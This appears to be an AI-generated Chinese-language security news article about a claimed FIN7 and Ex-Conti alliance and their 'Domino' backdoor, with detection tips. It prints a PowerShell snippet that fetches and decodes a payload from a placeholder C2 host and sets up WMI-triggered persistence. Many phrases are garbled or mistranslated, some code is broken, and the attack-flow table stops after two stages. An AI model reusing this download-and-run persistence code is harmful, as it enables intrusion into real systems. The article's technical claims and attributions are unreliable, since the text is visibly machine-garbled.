Home/區塊鏈 / FIN7 與 Ex‑Conti 資安犯罪團夥聯盟,打造新世代「Domino」後門威脅。

FIN7 與 Ex‑Conti 資安犯罪團夥跨域合作:Domino 祕密後門新世代

近期多家網安機構同步報告,資安犯罪團夥 FIN7 與 Ex‑Conti(前身為 Conti)結成聯盟,互相交換開源程式碼,以打造全新的後門此乃「Domino」系列。此舉不僅充斥企業管道的威脅面貌,更為各安全團隊在尋找攻擊面與行為偵測時帶來全新挑戰。下文將梳理此組合帶來的技術提升、攻擊流程、偵測要點,並提出實務防護建議。

1. 合作動機與武器共用

  • 互補性能力:FIN7 以商業間諜為主,核心在社交工程與精準滲透;Ex‑Conti 則專精於規則化 ransomware 並構建龐大的 C&C 基礎設施。兩者結合後,可形成從初始接觸到大量資料外流的完整攻擊鏈。
  • 程式代碼共用:根據 IBM X‑Force Analysis,Domino 後門利用了 FIN7 為期 9 年蒐集的 Windows Agent 代碼與 Ex‑Conti 使用的加密機制,並為二者加入了同一套演化的 Persistence API。此技術層面相當於在交換「武器庫」與「符號表」。
  • 基礎設施互補:FIN7 先前的「Domino」RAT 以隱蔽的 TLS 隧道為主,Ex‑Conti 則在其 C&C 網域上部署了 CDN 副本般的擴散病毒,兩者共同為後門提供了「分布式殼蓋」。

2. Domino 後門的技術剖析

Domino 後門為三層式:前件、後段代理與側移處理器。其核心程式碼已完成以下重構:
/* 1. 前件:使用 PowerShell 脂式偽造環境 */
$Proxy = New-Object System.Net.WebClient;
$Proxy.Proxy = $null;
$payload = $Proxy.DownloadString("https://domino.c2/acquire");
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($payload))
/* 2. 隱寫:利用 WMI & PowerShell 事件觸發器確保流程連續性 */
New-EventLog -LogName "Domino" -Source "WMI";
Register-WmiEvent -Namespace rootcimv2 -Class Win32_ProcessStartTrace `
  -Action {Start-Process $env:COMSPEC -ArgumentList $args}

  • 使用 PowerShell RCEWMI 攻擊 來安裝完成度差異化的後門。
  • 加密通訊採用 HMAC‑SHA256+AES‑256 並隨機改變端口,對於傳統 IPS/IDS 判別造成戴夫困難。
  • 通過腳本注入到 Windows Defender 的偵測規則,利用 Registry 改寫與 Sysmon 規則疏漏達到 EDR 拜護。

3. 攻擊流程與典型場景

階段 核心操作 技術手段 偵測要點
1. 初始入侵 釣魚郵件+附加便箋 社交工程+JavaScript initial payload 郵件內容過濾、未知附件掃描
2. 執行 & 圖形化持久化 執行已加密的 PowerShell 代碼 WMI觸發器、排程任務 WMI 事件紀錄、排程任務審計

🧠 本文由 DreamJ AI 自動生成系統撰寫,內容經 AI 模型審核與自動優化, 僅供技術參考與研究用途。

FIN7 與 Ex‑Conti 資安犯罪團夥聯盟,打造新世代「Domino」後門威脅。

🧠 本文章與所附圖片部分內容為 AI 生成或 AI 輔助產製。文中提及之商標、品牌名稱、產品圖片及相關標識, 其著作權與商標權均屬原權利人所有,本網站僅作為資訊呈現與示意使用

最新文章

華碩推新韌體:修補八項重大路由器安全漏洞,護航 AiCloud 服務安全

華碩修補路由器8項漏洞 影響啟用 AiCloud 服務…

AI賦能:分解式儲存與超融合架構的智慧進化

AI 在分解式儲存與超融合架構中的新興應用脈絡
近一季…

即時惡意軟體分析的儲存革命—分解式叢集、FlashBlade 與超融合架構

攻擊與惡意軟體分析的資料儲存新視角:從分解式儲存叢集、…

破解高風險攻擊:近一年系統漏洞徹底分析與即時修補實務

系統漏洞分析與修補策略:針對近一年高風險攻擊的實務探討

中國部署Claude聊天機器人,掀起全新資訊安全風險

中國利用自己的Claude聊天機器人所引發的新型安全風…

Oracle EBS成攻擊焦點,Canon、Mazda美國分公司雙遭駭客侵入

Canon、Mazda 美國分公司遭駭!Oracle …

推薦文章
破解高風險攻擊:近一年系統漏洞徹底分析與即時修補實務

系統漏洞分析與修補策略:針對近一年高風險

中國部署Claude聊天機器人,掀起全新資訊安全風險

中國利用自己的Claude聊天機器人所

網路技術/基礎設施:AI代理架構刷新金融安全與雲端趨勢

網路技術與基礎設施:近一年新聞回

分析完成 ✔